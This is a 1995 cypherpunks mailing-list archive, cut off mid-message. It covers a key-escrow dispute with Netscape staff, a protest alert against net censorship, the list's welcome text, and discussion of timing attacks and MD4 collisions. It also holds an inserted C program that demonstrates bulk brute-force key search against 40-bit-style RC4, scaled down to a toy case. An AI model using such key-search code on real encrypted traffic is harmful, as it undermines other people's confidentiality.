> > I just get sick of those who tout themselves as Experts in Software
> > Munitions and are in fact are merely in it for the cash.  In it for the
> > cash is just fine.  Just don't tell me later you aren't.
> 
>   Can't I be a supporter of strong crypto, and also be in it for the money?
> Many people here make good money off of crypto related work.  If I'm asked
> to implement GAK in a situation where it is not mandated by law, I won't
> do it.

You can be a supporter of strong crypto, and be in it for the money.  I 
do not believe you can be a supporter of strong crypto and not fight GAK 
tooth and nail, which I just don't see you doing.  Sure, you will obey 
the law, but will you do anything to influence its development?

All insult and prodding aside, really ask yourself this.

You've been GIFTED with a position of immense political power and a 
strong and vibrant voice.  Why aren't you using it?  I know the answer 
because I've talked to the attorneys.  Do YOU know it?

> > > I read the Jim Clark statement that Jeff forwarded. It seemed noncommittal
> > > on the actual issue of whether Netscape will build a U.S.-supported GAK (as
> > > opposed to offering GAK for the Iraqis or French). I await with interest
> > > the clarification of the anti-GAK stance that Jeff alluded to.
> > 
> > I believe you got it with:
> > 
> > "If the law requires GAK, then I believe that we will implement it rather
> > than just disable encryption."
> 
>   Tim was referring to the position statement against GAK that we will be
> releasing before the NIST meeting next week.

I think it's clear what you will say at NIST, and exactly what it has to 
do with Netscape's real position on the issue.

> 
> > Note that the phrase is entirely ambiguous on whether this refers to the
> > law requiring GAK for export, or export AND domestic sales.  Netscape
> > will install GAK into whatever will increase its sales.  I understand
> > and respect this position in the context of a company which needs
> > badly to start raking in some profits.
> 
>   What I meant, and have said in other places, is that if it is legal to
> ship a product without GAK for use inside the US, or anywhere else,
> I believe we will do it, because that is what our customers want.

What you have ignored, and ignored in other places, is the fact that 
Netscape has a good deal of clout today.  If you were really for strong 
crypto, why aren't you using it, why isn't Netscape using it, to cripple 
GAK, an entirely doable endeavor, rather than just seeking some 
redundant 'clarification' of the current law, (which even in its most 
mild interpretation is below the threshold of acceptable to any strong 
crypto advocate)?

More to the point, why are you telling us what a strong crypto supporter 
you are instead of SHOWING us?

> > The title "Software Munitions Expert" or similar such should probably be
> > changed to "GAK marketing expert" however.
> 
>   I'm sorry my dig at the ITAR does not amuse you.

I find it very amusing and clever.  I just don't think it's a title you 
deserve.

> Your suggested
> replacement would not be appropriate since I don't support GAK (I believe
> that it is one of the most evil things any government could do to its
> citizens),

So let's see some energy and action that supports that position.  Talk is 
cheap.

> and I'm not in marketing.

You missed your calling.  You've got Mr. Weinstein hanging on your every 
word.

> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 3 Dec 1995 19:59:31 +0800
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: unwanted AIP mail?
In-Reply-To: <199512022323.AAA00288@utopia.hacktic.nl>
Message-ID: <Pine.BSD.3.91.951203003505.27625A-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



   AIP news list is rather privileged --it is run by the American Physical
Society. It is an advanced listing of research projects which may have a
breakthrough, basically inviting other physicists to corroborate, disprove,
or preferably augment their basic research. 

   I am a member of the society, which is rather staid.

   The list is a standard "listproc" which should accept the indirect 
command on the first message line:

unsubscribe physnews cypherpunks@toad.com


On Sun, 3 Dec 1995, Anonymous wrote:

> Anyone else suddenly start hearing from these folks?
> 
> >  Date: Fri, 1 Dec 95 14:44:34 EST
> >  From: physnews@aip.org (AIP listserver)
> >  Message-Id: <9512011944.AA12171@aip.org>
> >  To: physnews-mailing@aip.org
> >  Subject: update.250
> >  X-UIDL: 817946091.001
> >  
> >  PHYSICS NEWS UPDATE                         
> >  The American Institute of Physics Bulletin of Physics News
> >  Number 250 December 1, 1995       by Phillip F. Schewe and Ben
> >  Stein
> >  
> >  TWO-BIT QUANTUM LOGIC GATES have been experimentally {...}
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lyalc@ozemail.com.au (lyal collins)
Date: Sun, 3 Dec 1995 12:09:54 +0800
To: cypherpunks@toad.com
Subject: bulk RC4 brute forcing
Message-ID: <199512030356.OAA17497@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Some time ago, I wrote about testing multiple plain/cipher pairs against a
key as a possible speed up for brute forcing 40 bit RC4 key cracking.

I have finally done something about it, written some code, and run tests
which I believe give about a 6-8 times improvement over single
key/plain/cipher testing against RC4-40 encryption.

Basically:
A single RC4 master "key schedule" is generated.
This is copied to a master array of 126 RC4_keys (126 chosen due to segment
boundary probs).
Then each of 126 plain/cipher (P/C) pairs are tested for a match. Acquiring
the plain/cipher pairs in real life is another question.
If a match is found, the pair is marked 'found', and testing continues on
the remaining unfound P/C pairs.
This loops until all 126 plain/cipher/keys have been tested and found.
8 plaintext, 8 cipher bytes are used. Keys are 8 bytes, the last 5 of which
are variable (40 bits).

Test results :
A test set of data was created by incrementing a key byte, and making a P/C
pair.
Then all keys bytes are set to 0, and testing commenced.
Typically, a 486/33 with the above in 'C' code running on DOS achieves about
15000 tests per second.
One extended test ran about 480 million tests in 7.5 hours and found 68% of
the keys - approx 17,700/sec, averaging 5.6 million tests per found key.

My reasoning follows thus:
For 126 plain/cipher pairs, with "randomly" generated keys, one valid
key/plain/cipher pairs 'should' be located in 2^33 key tries (126 is approx.
2^7)
15000 tests/sec across 126 P/C pairs is about 119 keys/second tested.
at 119/second, 2^33 key tests will take 835 days. This should "guarantee"
a key match is found.
By contrast: 
The "bruterc4.c" code used by this forum earlier showed approximately 2200
key tests per second on my machine. Testing 2^40 keys at 2200/sec will take
5784 days to guarantee a key match (using 2^39, 2892 days).
This is a 6.9(3.46) ratio, that finds a single key match.
Finding all 126 keys should take approximately 293 years in "bulk"
mode, or 1996 years in single mode (126x5784 days).

The code is available, and will be posted here if desired (it is messy).

Ideally, faster key/plain/cipher testing could be accomplished if a larger
array of keys could be used. The Intel segment problem has prevented me from
making larger arrays - I don't know how to turn these features in my
compiler (yes - I am a beginner at coding, but the "huge" directive in
Borland C did not seem to work, and I don't know why - yet). 
Tests on 31, 63 and 126 P/C pairs showed results of 10689, 13326 and 15689
tests/sec, respectively. This indicates array size has a direct relationship
with test/sec.

I invite others who can better manipulate statistics, or are better experienced,
to comment, refute, or otherwise contribute to this.

lyal
All mistakes in this message belong to me - you should not use them!
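
An added illustration of the bulk test described in the message above; it is not lyal's code and not part of the original post. It assumes a 16-bit variable key part instead of 40, four constructed plain/cipher pairs instead of 126, and it compares one keystream against P xor C for each pair rather than copying the key schedule per pair (equivalent, since RC4 is a stream cipher).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define KEY_LEN  8    /* 8-byte RC4 key, as in the post */
#define BLOCK    8    /* 8 known-plaintext and 8 ciphertext bytes per pair */
#define NTARGETS 4    /* constructed; the post uses 126 pairs */
#define VAR_BITS 16   /* assumption: cut down from the post's 40 variable bits */

struct target {
    uint8_t  want[BLOCK];  /* P xor C: keystream the right key must produce */
    int      found;
    uint32_t key;          /* recovered variable key bits */
};

/* Constructed secrets for the demo; a real search would not know these. */
static const uint32_t SECRET[NTARGETS] = {0x4567, 0xCDEF, 0x0123, 0x89AB};

/* Standard RC4: key schedule, then n bytes of keystream. */
static void rc4_keystream(const uint8_t *key, size_t klen, uint8_t *out, size_t n)
{
    uint8_t S[256], t;
    unsigned i, j = 0;
    for (i = 0; i < 256; i++) S[i] = (uint8_t)i;
    for (i = 0; i < 256; i++) {
        j = (j + S[i] + key[i % klen]) & 0xff;
        t = S[i]; S[i] = S[j]; S[j] = t;
    }
    i = j = 0;
    for (size_t k = 0; k < n; k++) {
        i = (i + 1) & 0xff;
        j = (j + S[i]) & 0xff;
        t = S[i]; S[i] = S[j]; S[j] = t;
        out[k] = S[(S[i] + S[j]) & 0xff];
    }
}

/* Fixed leading key bytes are zero; only the last VAR_BITS bits vary. */
static void make_key(uint32_t v, uint8_t key[KEY_LEN])
{
    memset(key, 0, KEY_LEN);
    key[KEY_LEN - 2] = (uint8_t)(v >> 8);
    key[KEY_LEN - 1] = (uint8_t)v;
}

static void build_targets(struct target t[NTARGETS])
{
    uint8_t key[KEY_LEN], ks[BLOCK], pt, ct;
    for (int n = 0; n < NTARGETS; n++) {
        make_key(SECRET[n], key);
        rc4_keystream(key, KEY_LEN, ks, BLOCK);
        for (int b = 0; b < BLOCK; b++) {
            pt = (uint8_t)('A' + n + b);   /* constructed known plaintext */
            ct = pt ^ ks[b];               /* the matching ciphertext byte */
            t[n].want[b] = pt ^ ct;
        }
        t[n].found = 0; t[n].key = 0;
    }
}

/* One key schedule per candidate key, compared against every unfound pair.
   Returns the number of key schedules run before stop_after new hits. */
static uint32_t bulk_search(struct target t[NTARGETS], int stop_after)
{
    uint8_t key[KEY_LEN], ks[BLOCK];
    uint32_t v, tried = 0;
    int hits = 0;
    for (v = 0; v < (1u << VAR_BITS) && hits < stop_after; v++) {
        make_key(v, key);
        rc4_keystream(key, KEY_LEN, ks, BLOCK);   /* the expensive step */
        tried++;
        for (int n = 0; n < NTARGETS; n++)
            if (!t[n].found && memcmp(ks, t[n].want, BLOCK) == 0) {
                t[n].found = 1; t[n].key = v; hits++;
            }
    }
    return tried;
}

/* Key schedules needed for the first hit. only >= 0 restricts the search to
   that one pair (single mode); only < 0 tests all pairs at once (bulk mode). */
static uint32_t first_hit_cost(int only)
{
    struct target t[NTARGETS];
    build_targets(t);
    for (int n = 0; n < NTARGETS; n++) t[n].found = (only >= 0 && n != only);
    return bulk_search(t, 1);
}

int main(void)
{
    printf("bulk, first key found after %u key schedules\n",
           (unsigned)first_hit_cost(-1));
    for (int n = 0; n < NTARGETS; n++)
        printf("single, pair %d found after %u key schedules\n",
               n, (unsigned)first_hit_cost(n));
    return 0;
}
```

The saving exists only because every pair shares the same fixed key bytes; when each message's key includes a different known salt, one key schedule can no longer be checked against all pairs.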





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 8 Dec 1995 11:00:50 +0800
To: cypherpunks@toad.com
Subject: Re: DigiCash releases protocol specs!
Message-ID: <9512012324.AA01808@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  By popular request, DigiCash is releasing the protocol specs.

Three cheers to DigiCash, Mark Twain, and Lucky!

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sarah Thompson <righter@aros.net>
Date: Tue, 12 Dec 1995 06:02:58 +0800
To: utah-firearms@xmission.xmission.com
Subject: ALERT:INTERNET DAY OF PROTEST TUESDAY DECEMBER 12, 1995 (fwd)
Message-ID: <199512100901.CAA15767@terra.aros.net>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Sun, 10 Dec 1995 01:44:01 -0700
>From: molly@aros.net
>Subject: ALERT:INTERNET DAY OF PROTEST TUESDAY DECEMBER 12, 1995 (fwd)
>To: andelain@aros.net, matti@community.net, CAPSTACK_T@MSdisk.WUstl.EDU,
>        will@btsslc.com
>
>
>========================================================================
>     CAMPAIGN TO STOP THE NET CENSORSHIP LEGISLATION IN CONGRESS
>
>    On Tuesday December 12, 1995, Join With Hundreds of Thousands
>                  Of Your Fellow Internet Users In
>
>                  A NATIONAL INTERNET DAY OF PROTEST
>
>      PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT WITH THIS BANNER INTACT
>                REDISTRIBUTE ONLY UNTIL December 20, 1995
>________________________________________________________________________
>CONTENTS
>        Internet Day of Protest: Tuesday December 12, 1995
>        What You Must Do On Tuesday December 12, 1995
>        List of Participating Organizations
>        Where Can I Learn More?
>
>________________________________________________________________________
>INTERNET DAY OF PROTEST:  TUESDAY DECEMBER 12, 1995
>
>Outrageous proposals to censor the Internet demand that the Internet
>Community take swift and immediate action. We must stand up and let
>Congress know that we will not tolerate their attempts to destroy this
>medium! Please join hundreds of thousands of your fellow citizens in a
>National Day of Protest on Tuesday December 12, 1995.
>
>As you know, on Wednesday December 6, 1995, the House Conference
>Committee on Telecommunications Reform voted to impose far reaching and
>unconstitutional "indecency" restrictions on the Internet and other
>interactive media, including large commercial online services (such as
>America Online, Compuserve, and Prodigy) and smaller Internet Service
>Providers such as Panix, the Well, Echo, and Mindvox.
>
>These restrictions threaten the very existence of the Internet and
>interactive media as a viable medium for free expression, education,
>commerce.  If enacted, the Internet as we know it will never be the
>same.
>
>Libraries will not be able to put any books online that might
>offend a child somewhere.  No "Catcher in the Rye" or "Ulysses" on the net.
>Internet Service Providers could face criminal penalties for allowing
>children to subscribe to their Internet Services, forcing many  small
>companies to simply refuse to sell their services to anyone under 18. Worst
>of all, everything you say and publish on the net will have to be "dumbed
>down" to that which is acceptable to a child.
>
>As Internet users, we simply must not allow this assault against the
>Internet and our most basic freedoms to go unchallenged.
>
>On Tuesday December 12, the organizations below are urging you to
>join us in a NATIONAL DAY OF PROTEST. The goal is to flood key members of
>the House and Senate with phone calls, faxes and email with the message
>that the Internet community WILL NOT TOLERATE Congressional attempts to
>destroy the Internet, limit our freedoms and trample on our rights.
>
>Below are the phone, fax, and email address of several key members of
>Congress on this issue and instructions on what you can do to join the
>National Day of Protest to save the Net.
>
>______________________________________________________________________
>WHAT YOU MUST DO ON TUESDAY DECEMBER 12, 1995
>
>1. Throughout the day Tuesday December 12, please contact as many
>   members of Congress on the list below as you can. If you are only
>   able to make one call, contact House Speaker Newt Gingrich. Finally,
>   if the Senator or Representative from your state is on the list
>   below, be sure to contact him or her also.
>
>2. Urge each Member of Congress to "stop the madness".  Tell them that
>   they are about to pass legislation that will destroy the Internet as
>   an educational and commercial medium.  If you are at a loss for
>   words, try the following sample communique:
>
>   Sample phone call:
>
>        Both the House and Senate bills designed to protect children
>        from objectionable material on the Internet will actually
>        destroy the Internet as a medium for education, commerce, and
>        political discourse. There are other, less restrictive ways to
>        address this issue.
>
>        I urge you to oppose both measures being proposed in the
>        conference committee.  This is an important election issue to
>        me.
>
>   Sample letter (fax or email):
>
>        The Senate conferees are considering ways to protect children
>        from inappropriate material on the Internet.  A vote for either
>        the House or Senate proposals will result in the destruction of
>        the Internet as a viable medium for free expression, education,
>        commerce.  Libraries will not be able to put their entire book
>        collections online.  Everyday people like me will risk massive
>        fines and prison sentences for public discussions someone
>        somewhere might consider "indecent".
>
>        There are other, less restrictive ways to protect children from
>        objectionable material online. This is an important election
>        issue to me.
>
>3. If you're in San Francisco, or near enough to get there, go to
>   the Rally Against Censorship from Ground Zero of the Digital Revolution:
>
>   WHEN: Monday, December 11, 1995  12:00 - 1:00 PM
>   WHERE: South Park (between 2nd and 3rd, Bryant and Brannon) San Francisco.
>   SPEAKERS: To be announced
>   BRING: Attention-grabbing posters, signs, and banners that demonstrate
>        your commitment to free speech and expression, and your feelings
>        about Congress.
>   FOR UPDATED INFORMATION (including rain info):
>        http://www.hotwired.com/staff/digaman/
>
>
>### THIS IS VERY IMPORTANT ###
>
>4. Mail a note to protest@vtw.org to let us know you did your part.
>   Although you will not receive a reply due to the number of
>   anticipated responses, we'll be counting up the number of people that
>   participated in the day of protest.
>
>
>      P ST Name and Address           Phone           Fax
>      = == ========================   ==============  ==============
>      R AK Stevens, Ted               1-202-224-3004  1-202-224-1044
>      R AZ McCain, John               1-202-224-2235  1-602-952-8702
>        senator_mccain@mccain.senate.gov
>      D HI Inouye, Daniel K.          1-202-224-3934  1-202-224-6747
>      R KS Dole, Robert               1-202-224-6521  1-202-228-1245
>      D KY Ford, Wendell H.           1-202-224-4343  1-202-224-0046
>        wendell_ford@ford.senate.gov
>      R MS Lott, Trent                1-202-224-6253  1-202-224-2262
>      R MT Burns, Conrad R.           1-202-224-2644  1-202-224-8594
>        conrad_burns@burns.senate.gov
>      D NE Exon, J. J.                1-202-224-4224  1-202-224-5213
>      D SC Hollings, Ernest F.        1-202-224-6121  1-202-224-4293
>        senator@hollings.senate.gov
>      R SD Pressler, Larry            1-202-224-5842  1-202-224-1259
>        larry_pressler@pressler.senate.gov
>      R WA Gorton, Slade              1-202-224-3441  1-202-224-9393
>        senator_gorton@gorton.senate.gov
>      D WV Rockefeller, John D.       1-202-224-6472  n.a.
>        senator@rockefeller.senate.gov
>
>   Dist ST Name, Address, and Party     Phone            Fax
>   ==== == ========================     ==============  ==============
>      6 GA Gingrich, Newt (R)           1-202-225-4501   1-202-225-4656
>             2428 RHOB                      georgia6@hr.house.gov
>     14 MI Conyers Jr., John (D)        1-202-225-5126   1-202-225-0072
>             2426 RHOB                      jconyers@hr.house.gov
>      1 CO Schroeder, Patricia (D)      1-202-225-4431   1-202-225-5842
>             2307 RHOB
>     18 TX Jackson-Lee, Sheila (D)      1-202-225-3816   1-202-225-3317
>             1520 LHOB
>      6 TN Gordon, Bart (D)             1-202-225-4231   1-202-225-6887
>             2201 RHOB
>
>
>4. Forward this alert to all of your wired friends.
>
>________________________________________________________________________
>WHERE CAN I LEARN MORE?
>
>At this moment, there are several organizations with WWW sites that now
>have, or will have, information about the net censorship legislation and
>the National Day Of Protest:
>
>American Civil Liberties Union (ftp://ftp.aclu.org/aclu/)
>Center for Democracy and Technology (http://www.cdt.org/)
>Electronic Frontier Foundation (http://www.eff.org/)
>Electronic Privacy Information Center (http://www.epic.org/)
>Wired Magazine (http://www.hotwired.com/special/indecent/)
>Voters Telecommunications Watch (http://www.vtw.org/)
>
>________________________________________________________________________
>LIST OF PARTICIPATING ORGANIZATIONS
>
>In order to use the net more effectively, several organizations have
>joined forces on a single Congressional net campaign to stop the
>Communications Decency Act.
>
>
>American Civil Liberties Union * American Communication Association *
>American Council for the Arts * Arts & Technology Society * Association
>of Alternative Newsweeklies * biancaTroll productions * Boston
>Coalition for Freedom of Expression * Californians Against Censorship
>Together * Center For Democracy And Technology * Centre for Democratic
>Communications * Center for Public Representation * Citizen's Voice -
>New Zealand * Cloud 9 Internet * Computer Communicators Association *
>Computel Network Services * Computer Professionals for Social
>Responsibility * Cross Connection * Cyber-Rights Campaign * CyberQueer
>Lounge * Dorsai Embassy * Dutch Digital Citizens' Movement * ECHO
>Communications Group, Inc. * Electronic Frontier Canada * Electronic
>Frontier Foundation * Electronic Frontier Foundation - Austin *
>Electronic Frontiers Australia * Electronic Frontiers Houston *
>Electronic Frontiers New Hampshire * Electronic Privacy Information
>Center * Feminists For Free Expression * First Amendment Teach-In *
>Florida Coalition Against Censorship * FranceCom, Inc. Web Advertising
>Services * Friendly Anti-Censorship Taskforce for Students * Hands
>Off!  The Net * Inland Book Company * Inner Circle Technologies, Inc. *
>Inst. for Global Communications * Internet On-Ramp, Inc. * Internet
>Users Consortium * Joint Artists' and Music Promotions Political Action
>Committee * The Libertarian Party * Marijuana Policy Project *
>Metropolitan Data Networks Ltd. * MindVox * MN Grassroots Party *
>National Bicycle Greenway * National Campaign for Freedom of Expression
>* National Coalition Against Censorship * National Gay and Lesbian Task
>Force * National Public Telecomputing Network * National Writers Union
>* Oregon Coast RISC * Panix Public Access Internet * People for the
>American Way * Republican Liberty Caucus * Rock Out Censorship *
>Society for Electronic Access * The Thing International BBS Network *
>The WELL * Voters Telecommunications Watch
>
>(Note: All 'Electronic Frontier' organizations are independent entities,
> not EFF chapters or divisions.)
>
>________________________________________________________________________
>        End Alert
>========================================================================
>
>
>
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                         Paula Davidson
>                  mesoelectronic hunter/gatherer
>      davidson@cs.unca.edu    http://www.cs.unca.edu/~davidson/
>  Specializing in Exploration and Tool Use on the Matrix of the Net
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>
>
>
>
><----  End Forwarded Message  ---->
>
>
>
Sarah Thompson, M.D.
righter@aros.net
Executive Director, Women Against Gun Control
PO Box 271307
Salt Lake City, UT 84127-1307
(801)328-9660 - voice
(801)966-7278 - fax






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@toad.com
Date: Mon, 11 Dec 1995 16:11:36 +0800
To: cypher@infinity.nus.sg
Subject: Your Majordomo request results
Message-ID: <9512110810.AA08978@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


--

Your request of Majordomo was:
>>>> subscribe cypherpunks
Succeeded.
Your request of Majordomo was:
>>>> end
END OF COMMANDS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@toad.com
Date: Mon, 11 Dec 1995 16:10:53 +0800
To: cypher@infinity.nus.sg
Subject: Welcome to cypherpunks
Message-ID: <9512110810.AA08979@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


--

Welcome to the cypherpunks mailing list!

If you ever want to remove yourself from this mailing list,
you can send mail to "Majordomo@toad.com" with the following command
in the body of your email message:

    unsubscribe cypherpunks Cypherpunks Mailing List <cypher@infinity.nus.sg>

Here's the general information for the list you've
subscribed to, in case you don't already have it:



About cypherpunks
-----------------

I. Administrivia (please read, boring though it may be)

The cypherpunks list is a forum for discussing personal defenses for
privacy in the digital domain.  It is a high volume mailing list.  If
you don't know how to do something, like unsubscribe, send mail to

	majordomo@toad.com

and the software robot which answers that address will send you back
instructions on how to do what you want.  If you don't know the
majordomo syntax, an empty message to this address will get you a help
file, as will a command 'help' in the body.  Even with all this
automated help, you may still encounter problems.  If you get really
stuck, please feel free to contact me directly at the address I use
for mailing list management:

	cypherpunks-owner@toad.com

Please use this address for all mailing list management issues.  Hint:
if you try to unsubscribe yourself from a different account than you
signed up for, it likely won't work.  Log back into your old account
and try again.  If you no longer have access to that account, mail me
at the list management address above.  Also, please realize that 
there will be some cypherpunks messages "in transit" to you at the
time you unsubscribe.  If you get a response that says you are unsubscribed,
but the messages keep coming, wait a day and they should stop.

For other questions, my list management address is not the best place,
since I don't read it every day.  To reach me otherwise, send mail to

	eric@remailer.net

This address is appropriate for emergencies (and wanting to get off
the list is never an emergency), such as the list continuously spewing
articles.  Please don't send me mail to my regular mailbox asking to
be removed; I'll just send you back a form letter.

Do not mail to the whole list asking to be removed.  It's rude.  The
-request address is made exactly for this purpose.

To post to the whole list, send mail to

	cypherpunks@toad.com

If your mail bounces repeatedly, you will be removed from the list.
Nothing personal, but I have to look at all the bounce messages.

There is no digest version available.

There is an announcements list which is moderated and has low volume.
Announcements for physical cypherpunks meetings, new software and
important developments will be posted there.  Mail to

	cypherpunks-announce-request@toad.com

if you want to be added or removed to the announce list.  All
announcements also go out to the full cypherpunks list, so there is no
need to subscribe to both.


II. About cypherpunks

The cypherpunks list is not designed for beginners, although they are
welcome.  If you are totally new to crypto, please get and read the
crypto FAQ referenced below.  This document is a good introduction,
although not short.  Crypto is a subtle field and a good understanding
will not come without some study.  Please, as a courtesy to all, do
some reading to make sure that your question is not already frequently
asked.

There are other forums to use on the subject of cryptography.  The
Usenet group sci.crypt deals with technical cryptography; cypherpunks
deals with technical details but slants the discussion toward their
social implications.  The Usenet group talk.politics.crypto, as it
says, is for political theorizing, and cypherpunks gets its share of
that, but cypherpunks is all pro-crypto; the debates on this list are
about how to best get crypto out there.  The Usenet group
alt.security.pgp is a pgp-specific group, and questions about pgp as
such are likely better asked there than here.  Ditto for
alt.security.ripem.

The cypherpunks list has its very own net.loon, a fellow named L.
Detweiler.  The history is too long for here, but he thinks that
cypherpunks are evil incarnate.  If you see a densely worded rant
featuring characteristic words such as "medusa", "pseudospoofing",
"treachery", "poison", or "black lies", it's probably him, no matter
what the From: line says.  The policy is to ignore these postings.
Replies have never, ever, not even once resulted in anything
constructive and usually create huge flamewars on the list.  Please,
please, don't feed the animals.


III. Resources.

A. The sci.crypt FAQ

anonymous ftp to rtfm.mit.edu:pub/usenet-by-group/sci.crypt

The cryptography FAQ is a good online intro to crypto.  Very much worth
reading.  Last I looked, it was in ten parts.

B. cypherpunks ftp site

anonymous ftp to ftp.csua.berkeley.edu:pub/cypherpunks

This site contains code, information, rants, and other miscellany.
There is a glossary there that all new members should download and
read.  Also recommended for all users are Hal Finney's instructions on
how to use the anonymous remailer system; the remailer sources are
there for the perl-literate.

C. Bruce Schneier's _Applied Cryptography_, published by Wiley

This is required reading for any serious technical cypherpunk.  An
excellent overview of the field, it describes many of the basic
algorithms and protocols with their mathematical descriptions.  Some
of the stuff at the edges of the scope of the book is a little
incomplete, so short descriptions in here should lead to library
research for the latest papers, or to the list for the current
thinking.  All in all, a solid and valuable book.  It's even got
the cypherpunks-request address.


IV. Famous last words

My preferred email address for list maintenance topics only is
hughes@toad.com.  All other mail, including emergency mail, should go
to hughes@ah.com, where I read mail much more regularly.

Enjoy and deploy.

Eric

-----------------------------------------------------------------------------

Cypherpunks assume privacy is a good thing and wish there were more
of it.  Cypherpunks acknowledge that those who want privacy must
create it for themselves and not expect governments, corporations, or
other large, faceless organizations to grant them privacy out of
beneficence.  Cypherpunks know that people have been creating their
own privacy for centuries with whispers, envelopes, closed doors, and
couriers.  Cypherpunks do not seek to prevent other people from
speaking about their experiences or their opinions.

The most important means to the defense of privacy is encryption. To
encrypt is to indicate the desire for privacy.  But to encrypt with
weak cryptography is to indicate not too much desire for privacy.
Cypherpunks hope that all people desiring privacy will learn how best
to defend it.

Cypherpunks are therefore devoted to cryptography.  Cypherpunks wish
to learn about it, to teach it, to implement it, and to make more of
it.  Cypherpunks know that cryptographic protocols make social
structures.  Cypherpunks know how to attack a system and how to
defend it.  Cypherpunks know just how hard it is to make good
cryptosystems.

Cypherpunks love to practice.  They love to play with public key
cryptography.  They love to play with anonymous and pseudonymous mail
forwarding and delivery.  They love to play with DC-nets.  They love
to play with secure communications of all kinds.

Cypherpunks write code.  They know that someone has to write code to
defend privacy, and since it's their privacy, they're going to write
it.  Cypherpunks publish their code so that their fellow cypherpunks
may practice and play with it.  Cypherpunks realize that security is
not built in a day and are patient with incremental progress.

Cypherpunks don't care if you don't like the software they write. 
Cypherpunks know that software can't be destroyed.  Cypherpunks know
that a widely dispersed system can't be shut down.

Cypherpunks will make the networks safe for privacy.

[Last updated Mon Feb 21 13:18:25 1994]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 12 Dec 1995 11:35:32 +0800
To: cypherpunks@toad.com
Subject: Re: Time-based cryptanalysis: How to defeat it?
Message-ID: <199512110854.AAA14652@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:56 PM 12/10/95 -0800, anonymous-remailer wrote:
>Assuming Alice is decrypting a secret message sent to her
>by Bob (on her very slow C64 ;), and Mallet is watching
>with a stopwatch in hand, hoping to determine Alice's secret
>key...

The modern equivalent of that very slow C64 is the smartcard/
electronic wallet.  Sounds like we'll have to implement them
very carefully....

>It would be good to place inside the decryption routines
>a timer (WELL PLACED!) that waits a random-number of cycles
>(based on key-strokes, mouse position, etc.) to defeat this
>type of cryptanalysis?

The most interesting detail in the paper, to me, was:

PK> Computing optional Ri+1 calculations regardless of whether the exponent 
PK> bit is set does not work and can actually make the attack easier;
PK> the computations still diverge but attackers no longer have to identify
PK> the lack of a correlation for adjacent zero exponent bits. 

My immediate reaction to the description of the timing attack on 
Diffie-Hellman had, of course, been to do precisely that :-)
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 12 Dec 1995 11:35:39 +0800
To: cypherpunks@toad.com
Subject: MD4 weaknesses (Was: Windows .PWL cracker implemented as a Word Basic virus)
Message-ID: <199512110901.BAA14965@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:20 PM 12/10/95 -0500, daw@quito.CS.Berkeley.EDU (David A Wagner) wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>In article <95Dec10.175318edt.1732@cannon.ecf.toronto.edu>,
>SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu> wrote:
>> My understanding was that MD4 had been broken once, at the cost of 
>> much computer time.
>Not *that* much computer time...
>In my copy of Hans Dobbertin's paper, the abstract says 
>
>``An implementation of our 
>attack allows to find collisions for MD4 in less than a minute on a PC.''
>
>As far as I know, the difficulty of inverting MD4 is still an open
>problem -- but why would you want to use a broken algorithm like MD4
>when you can use MD2, MD5, or SHA?

Do you have a reference to Dobbertin's paper?

Schneier's discussion of MD4 says that DeBoor and Bosselaers cryptanalyzed
the last two of the three rounds of MD4 in 1991, Merkle did the first two,
and Biham discussed a differential attack on the first two, but nobody
had done the whole thing.  Does Dobbertin's attack take one of these
and use it to feed an otherwise-brute-force search?
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Mon, 11 Dec 1995 18:27:46 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512110845.JAA25564@utopia.hacktic.nl>
Message-ID: <30CC02F5.4487@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Eric Young wrote:
> 
> I for one will probably add a flag for conditional compilation of my
> bignumber library so that it will take constant time.  This may be a
> %10 slow down (using small windows exponentiation) which is trivial
> compared to the %30 speedup I will probably get when I implement a
